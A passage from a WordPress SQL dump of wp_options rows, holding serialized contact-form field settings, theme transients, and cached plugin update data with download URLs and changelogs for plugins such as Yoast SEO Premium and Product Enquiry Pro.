left";s:9:"label_pos";s:5:"above";s:11:"placeholder";s:0:"";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:21:"user_info_field_group";s:1:"1";s:5:"email";s:1:"0";s:13:"disable_input";s:1:"0";s:3:"req";s:1:"0";s:4:"mask";s:0:"";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:17:"calc_auto_include";s:1:"0";s:10:"datepicker";s:1:"0";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:13:"default_value";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}s:6:"fav_id";N;s:6:"def_id";N;}i:14;a:7:{s:2:"id";s:2:"14";s:7:"form_id";s:2:"11";s:4:"type";s:5:"_text";s:5:"order";s:1:"3";s:4:"data";a:28:{s:5:"label";s:5:"Email";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"1";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:10:"user_phone";s:1:"0";s:10:"user_email";s:1:"1";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}s:6:"fav_id";s:1:"0";s:6:"def_id";s:2:"14";}i:15;a:7:{s:2:"id";s:2:"15";s:7:"form_id";s:2:"11";s:4:"type";s:5:"_text";s:5:"order";s:1:"4";s:4:"data";a:38:{s:5:"label";s:5:"Phone";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:14:"(999) 999-9999";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:10:"user_phone";s:1:"1";s:10:"user_email";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}s:6:"fav_id";N;s:6:"def_id";s:2:"15";}i:16;a:7:{s:2:"id";s:2:"16";s:7:"form_id";s:2:"11";s:4:"type";s:9:"_textarea";s:5:"order";s:1:"5";s:4:"data";a:14:{s:5:"label";s:7:"Message";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:12:"textarea_rte";s:1:"0";s:14:"textarea_media";s:1:"0";s:18:"disable_rte_mobile";s:1:"0";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";s:17:"calc_auto_include";s:1:"0";}s:6:"fav_id";s:1:"0";s:6:"def_id";s:1:"0";}i:17;a:7:{s:2:"id";s:2:"17";s:7:"form_id";s:2:"11";s:4:"type";s:7:"_submit";s:5:"order";s:1:"6";s:4:"data";a:7:{s:5:"label";s:4:"Send";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}s:6:"fav_id";s:1:"0";s:6:"def_id";s:1:"0";}}s:10:"field_keys";a:0:{}s:6:"errors";a:0:{}}', 'no'); 
INSERT INTO `wp_options` VALUES (693154, '_transient_timeout_yit_panel_sidebar_remote_widgets', '1503770325', 'no'); 
INSERT INTO `wp_options` VALUES (693155, '_transient_yit_panel_sidebar_remote_widgets', 'a:0:{}', 'no'); 
INSERT INTO `wp_options` VALUES (693156, '_transient_timeout_yit_panel_sidebar_remote_widgets_update', '1503493963', 'no'); 
INSERT INTO `wp_options` VALUES (693157, '_transient_yit_panel_sidebar_remote_widgets_update', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693160, '_transient_timeout_c3bb27d53abf5b2-update-response', '1503418364', 'no'); 
INSERT INTO `wp_options` VALUES (693161, '_transient_c3bb27d53abf5b2-update-response', 'O:8:"stdClass":9:{s:11:"new_version";s:5:"5.3.1";s:4:"name";s:31:"Yoast SEO for WordPress Premium";s:4:"slug";s:21:"wordpress-seo-premium";s:3:"url";s:69:"https://my.yoast.com/?download=wordpress-seo-premium&#038;changelog=1";s:12:"last_updated";s:19:"2017-08-22 12:53:50";s:8:"homepage";s:52:"https://my.yoast.com/?download=wordpress-seo-premium";s:7:"package";s:200:"http://my.yoast.com/edd-sl/package_download/MTUwODU5MTU2MzphYWU3NGI5M2I4YTVkNWU4NDFmZWQ0NDc1NGUwZjJhODoxMDUyNDM6MDFlZWI1MTA4YWU5NzM0NzVlNjg5MjVmNzkyZTdmZjc6aHR0cHNALy93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29t";s:13:"download_link";s:200:"http://my.yoast.com/edd-sl/package_download/MTUwODU5MTU2MzphYWU3NGI5M2I4YTVkNWU4NDFmZWQ0NDc1NGUwZjJhODoxMDUyNDM6MDFlZWI1MTA4YWU5NzM0NzVlNjg5MjVmNzkyZTdmZjc6aHR0cHNALy93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29t";s:8:"sections";a:2:{s:11:"description";s:53:"<p>The premium version of the Yoast SEO plugin.</p>\n";s:9:"changelog";s:586:"<p>5.3.1<br />\nAugust 22nd, 2017</p>\n<ul>\n<li>Includes every change in Yoast SEO core 5.3.1, see the <a href="https://wordpress.org/plugins/wordpress-seo/changelog/">core changelog</a>.</li>\n</ul>\n<p>5.3.0<br />\nAugust 22nd, 2017</p>\n<ul>\n<li>Add feature to export redirects, via SEO - Tools - Import/Export</li>\n<li>Removes the DC.date.issued meta tag</li>\n<li>When creating a redirect to a file, it will no longer show a warning that the target location does not exist</li>\n</ul>\n<p><a href="https://my.yoast.com/wordpress/plugins/seo/change-log/">See the full changelog here</a></p>\n";}}', 'no'); 
INSERT INTO `wp_options` VALUES (693162, '_site_transient_update_plugins', 'O:8:"stdClass":4:{s:12:"last_checked";i:1503407563;s:8:"response";a:29:{s:51:"all-in-one-wp-migration/all-in-one-wp-migration.php";O:8:"stdClass":8:{s:2:"id";s:37:"w.org/plugins/all-in-one-wp-migration";s:4:"slug";s:23:"all-in-one-wp-migration";s:6:"plugin";s:51:"all-in-one-wp-migration/all-in-one-wp-migration.php";s:11:"new_version";s:4:"6.55";s:3:"url";s:54:"https://wordpress.org/plugins/all-in-one-wp-migration/";s:7:"package";s:71:"https://downloads.wordpress.org/plugin/all-in-one-wp-migration.6.55.zip";s:6:"tested";s:3:"4.8";s:13:"compatibility";O:8:"stdClass":0:{}}s:61:"all-404-redirect-to-homepage/all-404-redirect-to-homepage.php";O:8:"stdClass":8:{s:2:"id";s:42:"w.org/plugins/all-404-redirect-to-homepage";s:4:"slug";s:28:"all-404-redirect-to-homepage";s:6:"plugin";s:61:"all-404-redirect-to-homepage/all-404-redirect-to-homepage.php";s:11:"new_version";s:3:"1.7";s:3:"url";s:59:"https://wordpress.org/plugins/all-404-redirect-to-homepage/";s:7:"package";s:71:"https://downloads.wordpress.org/plugin/all-404-redirect-to-homepage.zip";s:6:"tested";s:5:"4.7.1";s:13:"compatibility";O:8:"stdClass":0:{}}s:37:"async-javascript/async-javascript.php";O:8:"stdClass":8:{s:2:"id";s:30:"w.org/plugins/async-javascript";s:4:"slug";s:16:"async-javascript";s:6:"plugin";s:37:"async-javascript/async-javascript.php";s:11:"new_version";s:10:"2.17.06.13";s:3:"url";s:47:"https://wordpress.org/plugins/async-javascript/";s:7:"package";s:70:"https://downloads.wordpress.org/plugin/async-javascript.2.17.06.13.zip";s:6:"tested";s:3:"4.8";s:13:"compatibility";O:8:"stdClass":0:{}}s:17:"wpclef/wpclef.php";O:8:"stdClass":8:{s:2:"id";s:20:"w.org/plugins/wpclef";s:4:"slug";s:6:"wpclef";s:6:"plugin";s:17:"wpclef/wpclef.php";s:11:"new_version";s:5:"2.6.4";s:3:"url";s:37:"https://wordpress.org/plugins/wpclef/";s:7:"package";s:49:"https://downloads.wordpress.org/plugin/wpclef.zip";s:6:"tested";s:5:"4.6.6";s:13:"compatibility";O:8:"stdClass":0:{}}s:27:"comet-cache/comet-cache.php";O:8:"stdClass":8:{s:2:"id";s:25:"w.org/plugins/comet-cache";s:4:"slug";s:11:"comet-cache";s:6:"plugin";s:27:"comet-cache/comet-cache.php";s:11:"new_version";s:6:"170220";s:3:"url";s:42:"https://wordpress.org/plugins/comet-cache/";s:7:"package";s:61:"https://downloads.wordpress.org/plugin/comet-cache.170220.zip";s:6:"tested";s:9:"4.9-alpha";s:13:"compatibility";O:8:"stdClass":0:{}}s:37:"disable-comments/disable-comments.php";O:8:"stdClass":8:{s:2:"id";s:30:"w.org/plugins/disable-comments";s:4:"slug";s:16:"disable-comments";s:6:"plugin";s:37:"disable-comments/disable-comments.php";s:11:"new_version";s:3:"1.7";s:3:"url";s:47:"https://wordpress.org/plugins/disable-comments/";s:7:"package";s:59:"https://downloads.wordpress.org/plugin/disable-comments.zip";s:6:"tested";s:3:"4.8";s:13:"compatibility";O:8:"stdClass":0:{}}s:25:"duplicator/duplicator.php";O:8:"stdClass":8:{s:2:"id";s:24:"w.org/plugins/duplicator";s:4:"slug";s:10:"duplicator";s:6:"plugin";s:25:"duplicator/duplicator.php";s:11:"new_version";s:6:"1.2.18";s:3:"url";s:41:"https://wordpress.org/plugins/duplicator/";s:7:"package";s:60:"https://downloads.wordpress.org/plugin/duplicator.1.2.18.zip";s:6:"tested";s:5:"4.8.1";s:13:"compatibility";O:8:"stdClass":0:{}}s:39:"https-redirection/https-redirection.php";O:8:"stdClass":8:{s:2:"id";s:31:"w.org/plugins/https-redirection";s:4:"slug";s:17:"https-redirection";s:6:"plugin";s:39:"https-redirection/https-redirection.php";s:11:"new_version";s:3:"1.6";s:3:"url";s:48:"https://wordpress.org/plugins/https-redirection/";s:7:"package";s:60:"https://downloads.wordpress.org/plugin/https-redirection.zip";s:6:"tested";s:3:"4.8";s:13:"compatibility";O:8:"stdClass":0:{}}s:53:"nextend-facebook-connect/nextend-facebook-connect.php";O:8:"stdClass":8:{s:2:"id";s:38:"w.org/plugins/nextend-facebook-connect";s:4:"slug";s:24:"nextend-facebook-connect";s:6:"plugin";s:53:"nextend-facebook-connect/nextend-facebook-connect.php";s:11:"new_version";s:5:"2.0.2";s:3:"url";s:55:"https://wordpress.org/plugins/nextend-facebook-connect/";s:7:"package";s:73:"https://downloads.wordpress.org/plugin/nextend-facebook-connect.2.0.2.zip";s:6:"tested";s:5:"4.7.3";s:13:"compatibility";O:8:"stdClass":0:{}}s:19:"optimus/optimus.php";O:8:"stdClass":8:{s:2:"id";s:21:"w.org/plugins/optimus";s:4:"slug";s:7:"optimus";s:6:"plugin";s:19:"optimus/optimus.php";s:11:"new_version";s:5:"1.4.9";s:3:"url";s:38:"https://wordpress.org/plugins/optimus/";s:7:"package";s:50:"https://downloads.wordpress.org/plugin/optimus.zip";s:6:"tested";s:5:"4.8.1";s:13:"compatibility";O:8:"stdClass":0:{}}s:67:"remove-query-strings-from-static-resources/remove-query-strings.php";O:8:"stdClass":8:{s:2:"id";s:56:"w.org/plugins/remove-query-strings-from-static-resources";s:4:"slug";s:42:"remove-query-strings-from-static-resources";s:6:"plugin";s:67:"remove-query-strings-from-static-resources/remove-query-strings.php";s:11:"new_version";s:3:"1.4";s:3:"url";s:73:"https://wordpress.org/plugins/remove-query-strings-from-static-resources/";s:7:"package";s:89:"https://downloads.wordpress.org/plugin/remove-query-strings-from-static-resources.1.4.zip";s:6:"tested";s:5:"4.7.3";s:13:"compatibility";O:8:"stdClass":0:{}}s:57:"reveal-ids-for-wp-admin-25/reveal-ids-for-wp-admin-25.php";O:8:"stdClass":8:{s:2:"id";s:40:"w.org/plugins/reveal-ids-for-wp-admin-25";s:4:"slug";s:26:"reveal-ids-for-wp-admin-25";s:6:"plugin";s:57:"reveal-ids-for-wp-admin-25/reveal-ids-for-wp-admin-25.php";s:11:"new_version";s:5:"1.5.2";s:3:"url";s:57:"https://wordpress.org/plugins/reveal-ids-for-wp-admin-25/";s:7:"package";s:69:"https://downloads.wordpress.org/plugin/reveal-ids-for-wp-admin-25.zip";s:6:"tested";s:7:"4.8.999";s:13:"compatibility";O:8:"stdClass":0:{}}s:45:"search-and-replace/inspyde-search-replace.php";O:8:"stdClass":8:{s:2:"id";s:32:"w.org/plugins/search-and-replace";s:4:"slug";s:18:"search-and-replace";s:6:"plugin";s:45:"search-and-replace/inspyde-search-replace.php";s:11:"new_version";s:5:"3.1.2";s:3:"url";s:49:"https://wordpress.org/plugins/search-and-replace/";s:7:"package";s:67:"https://downloads.wordpress.org/plugin/search-and-replace.3.1.2.zip";s:6:"tested";s:5:"4.7.1";s:13:"compatibility";O:8:"stdClass":0:{}}s:37:"social-media-widget/social-widget.php";O:8:"stdClass":8:{s:2:"id";s:33:"w.org/plugins/social-media-widget";s:4:"slug";s:19:"social-media-widget";s:6:"plugin";s:37:"social-media-widget/social-widget.php";s:11:"new_version";s:5:"4.0.6";s:3:"url";s:50:"https://wordpress.org/plugins/social-media-widget/";s:7:"package";s:68:"https://downloads.wordpress.org/plugin/social-media-widget.4.0.6.zip";s:6:"tested";s:5:"4.7.2";s:13:"compatibility";O:8:"stdClass":0:{}}s:41:"speed-booster-pack/speed-booster-pack.php";O:8:"stdClass":8:{s:2:"id";s:32:"w.org/plugins/speed-booster-pack";s:4:"slug";s:18:"speed-booster-pack";s:6:"plugin";s:41:"speed-booster-pack/speed-booster-pack.php";s:11:"new_version";s:3:"3.5";s:3:"url";s:49:"https://wordpress.org/plugins/speed-booster-pack/";s:7:"package";s:65:"https://downloads.wordpress.org/plugin/speed-booster-pack.3.5.zip";s:6:"tested";s:5:"4.8.1";s:13:"compatibility";O:8:"stdClass":0:{}}s:58:"ultimate-social-media-plus/ultimate_social_media_icons.php";O:8:"stdClass":9:{s:2:"id";s:40:"w.org/plugins/ultimate-social-media-plus";s:4:"slug";s:26:"ultimate-social-media-plus";s:6:"plugin";s:58:"ultimate-social-media-plus/ultimate_social_media_icons.php";s:11:"new_version";s:5:"2.7.0";s:3:"url";s:57:"https://wordpress.org/plugins/ultimate-social-media-plus/";s:7:"package";s:75:"https://downloads.wordpress.org/plugin/ultimate-social-media-plus.2.7.0.zip";s:14:"upgrade_notice";s:33:"<ul>\n<li>Please update</li>\n</ul>";s:6:"tested";s:5:"4.8.1";s:13:"compatibility";O:8:"stdClass":0:{}}s:33:"w3-total-cache/w3-total-cache.php";O:8:"stdClass":8:{s:2:"id";s:28:"w.org/plugins/w3-total-cache";s:4:"slug";s:14:"w3-total-cache";s:6:"plugin";s:33:"w3-total-cache/w3-total-cache.php";s:11:"new_version";s:7:"0.9.5.4";s:3:"url";s:45:"https://wordpress.org/plugins/w3-total-cache/";s:7:"package";s:65:"https://downloads.wordpress.org/plugin/w3-total-cache.0.9.5.4.zip";s:6:"tested";s:5:"4.7.4";s:13:"compatibility";O:8:"stdClass":0:{}}s:27:"woocommerce/woocommerce.php";O:8:"stdClass":8:{s:2:"id";s:25:"w.org/plugins/woocommerce";s:4:"slug";s:11:"woocommerce";s:6:"plugin";s:27:"woocommerce/woocommerce.php";s:11:"new_version";s:5:"3.1.2";s:3:"url";s:42:"https://wordpress.org/plugins/woocommerce/";s:7:"package";s:60:"https://downloads.wordpress.org/plugin/woocommerce.3.1.2.zip";s:6:"tested";s:5:"4.8.1";s:13:"compatibility";O:8:"stdClass":0:{}}s:47:"woocommerce-csvimport/woocommerce-csvimport.php";O:8:"stdClass":8:{s:2:"id";s:35:"w.org/plugins/woocommerce-csvimport";s:4:"slug";s:21:"woocommerce-csvimport";s:6:"plugin";s:47:"woocommerce-csvimport/woocommerce-csvimport.php";s:11:"new_version";s:5:"3.3.5";s:3:"url";s:52:"https://wordpress.org/plugins/woocommerce-csvimport/";s:7:"package";s:64:"https://downloads.wordpress.org/plugin/woocommerce-csvimport.zip";s:6:"tested";s:5:"4.7.1";s:13:"compatibility";O:8:"stdClass":0:{}}s:29:"wp-site-migrate/blogvault.php";O:8:"stdClass":8:{s:2:"id";s:29:"w.org/plugins/wp-site-migrate";s:4:"slug";s:15:"wp-site-migrate";s:6:"plugin";s:29:"wp-site-migrate/blogvault.php";s:11:"new_version";s:4:"1.48";s:3:"url";s:46:"https://wordpress.org/plugins/wp-site-migrate/";s:7:"package";s:58:"https://downloads.wordpress.org/plugin/wp-site-migrate.zip";s:6:"tested";s:3:"4.8";s:13:"compatibility";O:8:"stdClass":0:{}}s:35:"wp-fastest-cache/wpFastestCache.php";O:8:"stdClass":8:{s:2:"id";s:30:"w.org/plugins/wp-fastest-cache";s:4:"slug";s:16:"wp-fastest-cache";s:6:"plugin";s:35:"wp-fastest-cache/wpFastestCache.php";s:11:"new_version";s:7:"0.8.7.2";s:3:"url";s:47:"https://wordpress.org/plugins/wp-fastest-cache/";s:7:"package";s:67:"https://downloads.wordpress.org/plugin/wp-fastest-cache.0.8.7.2.zip";s:6:"tested";s:5:"4.8.1";s:13:"compatibility";O:8:"stdClass":0:{}}s:45:"wp-live-chat-support/wp-live-chat-support.php";O:8:"stdClass":9:{s:2:"id";s:34:"w.org/plugins/wp-live-chat-support";s:4:"slug";s:20:"wp-live-chat-support";s:6:"plugin";s:45:"wp-live-chat-support/wp-live-chat-support.php";s:11:"new_version";s:6:"7.1.05";s:3:"url";s:51:"https://wordpress.org/plugins/wp-live-chat-support/";s:7:"package";s:63:"https://downloads.wordpress.org/plugin/wp-live-chat-support.zip";s:14:"upgrade_notice";s:109:"<p>It is highly recommended that you upgrade to WP Live Chat Support version 7.1.05 for security reasons.</p>";s:6:"tested";s:3:"4.8";s:13:"compatibility";O:8:"stdClass":0:{}}s:31:"wp-statistics/wp-statistics.php";O:8:"stdClass":8:{s:2:"id";s:27:"w.org/plugins/wp-statistics";s:4:"slug";s:13:"wp-statistics";s:6:"plugin";s:31:"wp-statistics/wp-statistics.php";s:11:"new_version";s:7:"12.0.12";s:3:"url";s:44:"https://wordpress.org/plugins/wp-statistics/";s:7:"package";s:64:"https://downloads.wordpress.org/plugin/wp-statistics.12.0.12.zip";s:6:"tested";s:5:"4.8.1";s:13:"compatibility";O:8:"stdClass":0:{}}s:27:"wp-super-cache/wp-cache.php";O:8:"stdClass":9:{s:2:"id";s:28:"w.org/plugins/wp-super-cache";s:4:"slug";s:14:"wp-super-cache";s:6:"plugin";s:27:"wp-super-cache/wp-cache.php";s:11:"new_version";s:5:"1.5.3";s:3:"url";s:45:"https://wordpress.org/plugins/wp-super-cache/";s:7:"package";s:63:"https://downloads.wordpress.org/plugin/wp-super-cache.1.5.3.zip";s:14:"upgrade_notice";s:141:"<p>Emergency fix of a critical bug that caused wp-super-cache to delete the wp-admin when deleting the plugin thanks to a null cache path</p>";s:6:"tested";s:5:"4.8.1";s:13:"compatibility";O:8:"stdClass":0:{}}s:33:"wp-term-images/wp-term-images.php";O:8:"stdClass":8:{s:2:"id";s:28:"w.org/plugins/wp-term-images";s:4:"slug";s:14:"wp-term-images";s:6:"plugin";s:33:"wp-term-images/wp-term-images.php";s:11:"new_version";s:5:"1.0.0";s:3:"url";s:45:"https://wordpress.org/plugins/wp-term-images/";s:7:"package";s:57:"https://downloads.wordpress.org/plugin/wp-term-images.zip";s:6:"tested";s:3:"4.8";s:13:"compatibility";O:8:"stdClass":0:{}}s:37:"yith-woocommerce-ajax-search/init.php";O:8:"stdClass":8:{s:2:"id";s:42:"w.org/plugins/yith-woocommerce-ajax-search";s:4:"slug";s:28:"yith-woocommerce-ajax-search";s:6:"plugin";s:37:"yith-woocommerce-ajax-search/init.php";s:11:"new_version";s:5:"1.5.3";s:3:"url";s:59:"https://wordpress.org/plugins/yith-woocommerce-ajax-search/";s:7:"package";s:77:"https://downloads.wordpress.org/plugin/yith-woocommerce-ajax-search.1.5.3.zip";s:6:"tested";s:5:"4.7.5";s:13:"compatibility";O:8:"stdClass":0:{}}s:34:"yith-woocommerce-wishlist/init.php";O:8:"stdClass":8:{s:2:"id";s:39:"w.org/plugins/yith-woocommerce-wishlist";s:4:"slug";s:25:"yith-woocommerce-wishlist";s:6:"plugin";s:34:"yith-woocommerce-wishlist/init.php";s:11:"new_version";s:5:"2.1.2";s:3:"url";s:56:"https://wordpress.org/plugins/yith-woocommerce-wishlist/";s:7:"package";s:74:"https://downloads.wordpress.org/plugin/yith-woocommerce-wishlist.2.1.2.zip";s:6:"tested";s:5:"4.7.4";s:13:"compatibility";O:8:"stdClass":0:{}}s:43:"product-enquiry-pro/product_enquiry_pro.php";O:8:"stdClass":11:{s:11:"new_version";s:3:"5.0";s:14:"stable_version";s:3:"5.0";s:4:"name";s:19:"Product Enquiry Pro";s:4:"slug";s:19:"product_enquiry_pro";s:3:"url";s:64:"https://wisdmlabs.com/downloads/product-enquiry-pro/?changelog=1";s:12:"last_updated";s:19:"2017-08-01 18:03:20";s:8:"homepage";s:52:"https://wisdmlabs.com/downloads/product-enquiry-pro/";s:7:"package";s:158:"https://wisdmlabs.com/edd-sl/package_download/MjM3OTc1MDE2MzozNzc3MTRmYzQ4OWM0YjIwMTkyM2NhNDRlOGYwNzk5MDozMjEyOjU1MTNlNjRkZTM4Y2JkODE1NDdiNTExYTU1M2QwN2M5Ojow";s:13:"download_link";s:158:"https://wisdmlabs.com/edd-sl/package_download/MjM3OTc1MDE2MzozNzc3MTRmYzQ4OWM0YjIwMTkyM2NhNDRlOGYwNzk5MDozMjEyOjU1MTNlNjRkZTM4Y2JkODE1NDdiNTExYTU1M2QwN2M5Ojow";s:8:"sections";a:2:{s:11:"description";s:90:"<p>Add an inquiry button on every WooCommerce product page and the shop archive page.</p>\n";s:9:"changelog";s:15061:"<p>5.0</p>\n<ul>\n<li>Improvement: Restructured Database: Created a new table ‘enquiry_products’ and migrated old details to the new one.</li>\n<li>Improvement: Made Enquiry Edit Page, Create Quote Page and Enquiry Cart Page Responsive</li>\n<li>Improvement: Refactored the Code</li>\n</ul>\n<p>4.5.0</p>\n<ul>\n<li>Feature: Added Google ReCaptcha to the form to prevent spam</li>\n<li>Feature: Added Search Field on the enquiry listing page to quick search a particular client or quote request</li>\n<li>Fix: Hide the filters on enquiry listing page when there are no enquiries of that type under it</li>\n<li>Fix: Display number of new enquiries on enquiry listing page</li>\n<li>Fix: Jump to checkout page when clicked on approve. No need to enter the email address associated with the quote request with the condition that quote is approved by clicking on the link in the email and not the pdf.</li>\n<li>Fix: Made the floating enquiry cart baloon sticky</li>\n<li>Fix: In the email settings, if ‘Mail to Admin’ and/or ‘Mail to Author’ is checked, then allow user to save email setting without any email address in the recipient field</li>\n<li>Fix: Removed telephone number validation to support all kinds of telephone number formats.</li>\n</ul>\n<p>4.4.0</p>\n<ul>\n<li>Feature: Attach Button on form which allows sending files to admin</li>\n<li>Feature: Having a PDF Quote as an attachment in the email sent to customers is now optional. Quotation will be displayed in the email body with link to checkout page.</li>\n<li>Feature: Screen Options added to set the number of items on enquiry listing page.</li>\n<li>Fix: Allow adding a second variation to the enquiry cart after the first one has been added.</li>\n<li>Fix: New and improved enquiry email template</li>\n<li>Fix: Common template for Single and Multiproduct enquiry emails.</li>\n<li>Fix: Create templating of Email Table.</li>\n<li>Fix: Text changes for ease of understanding.</li>\n<li>Fix: Browser page title changed to \'edit enquiry\' for ease of switching back to the right tab.</li>\n<li>Fix: Fixed WPML compatibility issues</li>\n<li>Fix: Stored enquiry language as site language even when WPML is not activated to avoid future compatibility issues.</li>\n<li>Fix: Fixed minor loading issuess.</li>\n<li>Fix: 500 Characters Remaining text now translation ready.</li>\n</ul>\n<p>4.3.1</p>\n<ul>\n<li>\nFeature: Now Compatible with php7+</li>\n<li>\nImprovement: Text changes made for better understanding\n</li>\n<li>\nBug Fixes Post WooCommerce 3.0 Release:\n</li>\n<li>Bug Fix: Add to cart issue on WooCommerce 3.0 resolved. Button now being hidden when disabled through bulk actions</li>\n<li>Bug Fix: Font Color on single product enquiry can be changed</li>\n<li>Bug Fix: Quantity now being sent in the enquiry email to the admin</li>\n<li>Bug Fix: Variable product price now being applied according to price in quotation</li>\n<li>Bug Fix: Decimal numbers will not be accepted in quantity field</li>\n<li>Bug Fix: Subject being sent twice if field left blank, now resolved</li>\n<li>Bug Fix: Variable Product Prices weren\'t being displayed after WooCommerce 3.0 update, now resolved.</li>\n<li>Bug Fix: Price validation on create quote page. Negative prices will not be accepted now.</li>\n<li>Bug Fix: Quantity Validation in Create Quote Page. Negative values will not be accepted now.</li>\n<li>Bug Fix: Solved all other validation issues.</li>\n</ul>\n<p><span style="color: #000000;">4.3.0</span></p>\n<ul>\n<li><span style="color: #000000;">Feature: Create New Quote from Dashboard.</span></li>\n<li><span style="color: #000000;">Feature: Allow creation of quote for \'sold individually\' products with more than 1 product of the same type.</span></li>\n<li><span style="color: #000000;">Feature: Add products to an existing quote using a simple \'Add Products\' field.</span></li>\n<li><span style="color: #000000;">Fix: Compatibility with WooCommerce 3.0</span></li>\n</ul>\n<p><span style="color: #000000;">4.2.0</span></p>\n<ul>\n<li><span style="color: #000000;">Feature: Added Quantity text box in single product enquiry form.</span></li>\n<li><span style="color: #000000;">Feature: Added Shortcode to display enquiry button on any page.</span></li>\n<li><span style="color: #000000;">Feature: Added enquiry support for all types of products (quotation system support available only for simple and variable product types).</span></li>\n<li><span style="color: #000000;">Feature: Added character limit of 500 to the message section.</span></li>\n<li><span style="color: #000000;">Fix: Made enquiry cart page and approval/rejection page responsive.</span></li>\n<li><span style="color: #000000;">Fix: Added date field validations on the front end.</span></li>\n<li><span style="color: #000000;">Fix:</span> <span style="color: #000000;">Fixed issues with WPML compatibility.</span></li>\n</ul>\n<p><span style="color: #000000;">4.1.0</span></p>\n<ul>\n<li><span style="color: #000000;">Feature - Added support for all variations of variable products.</span></li>\n<li><span style="color: #000000;">Feature - Provided bulk actions on products listing page to \'enable/disable enquiry\', \'show/hide price\' and \'enable/disable add to cart\'.</span></li>\n<li><span style="color: #000000;">Fix - CSS issue in some browsers.</span></li>\n<li><span style="color: #000000;">Fix - Made changes in session library to remove conflict with other plugins.</span></li>\n</ul>\n<p><span style="color: #000000;">4.0.2</span></p>\n<ul>\n<li><span style="color: #000000;">Fix - Fixed \'Click Here\' link that wasn\'t displaying in the generated pdfs.</span></li>\n</ul>\n<p><span style="color: #000000;">4.0.1</span></p>\n<ul>\n<li style="color: #000000;"><span style="color: #000000;">Feature - Added support to variable products same as version 3.1.1 with some </span>improvements<span style="color: #000000;">.</span></li>\n</ul>\n<p><span style="color: #000000;">4.0</span></p>\n<ul>\n<li style="color: #000000;"><span style="color: #000000;">Feature - Added quotation system.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Feature - Improved quotation details layout (when quotation system is enabled).</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Feature - Receive quote request from customers.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Feature - Create quotes and send it to your customers right from the dashboard.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Feature - Auto-generation of quotation PDF.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Feature - Product specific show or hide price on the </span>frontend<span style="color: #000000;">.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Fix - Improved the dashboard layout for both enquiry and quotation system.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Fix - Fixed error with setting W</span>ooCommerce<span style="color: #000000;"> cart page as enquiry cart.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Fix - Displaying quote button for products which are displayed using any W</span>ooCommerce<span style="color: #000000;"> shortcode.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Fix - Product enquiry pro settings does not take effects on variable products.</span></li>\n</ul>\n<p><span style="color: #000000;">3.1.1</span></p>\n<ul>\n<li style="color: #000000;"><span style="color: #000000;">Hover feature added.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Shortcode automatically added on enquiry cart page.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Shortcode removed from old enquiry cart page on enquiry cart page change.</span></li>\n<li style="color: #000000;">Problem<span style="color: 